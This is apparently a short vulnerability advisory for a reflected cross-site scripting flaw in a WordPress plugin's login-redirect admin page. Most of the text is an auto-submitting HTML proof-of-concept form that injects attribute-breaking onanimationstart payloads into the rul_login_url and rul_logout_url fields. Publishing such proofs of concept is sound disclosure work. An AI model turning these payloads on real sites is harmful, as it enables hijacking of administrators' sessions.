The plugin does not sanitise and escape the rul_login_url and rul_logout_url parameter before outputting them back in attributes in an admin page, leading to a Reflected Cross-Site Scripting issue
<html> <body> <form action="https://example.com/wp-admin/admin.php?page=loginwp-redirections&new=1" id="hack" method="POST"> <input type="hidden" name="rul_login_url" value='" style=animation-name:rotation onanimationstart=alert(/XSS-login_url/)//' /> <input type="hidden" name="rul_logout_url" value='" style=animation-name:rotation onanimationstart=alert(/XSS-logout_url/)//' /> <input type="submit" value="Submit request" /> </form> </body> <script> var form1 = document.getElementById('hack'); form1.submit(); </script> </html>
JrXnm
JrXnm
Yes
2021-11-08 (about 6 months ago)
2021-11-08 (about 6 months ago)
2022-04-16 (about 1 months ago)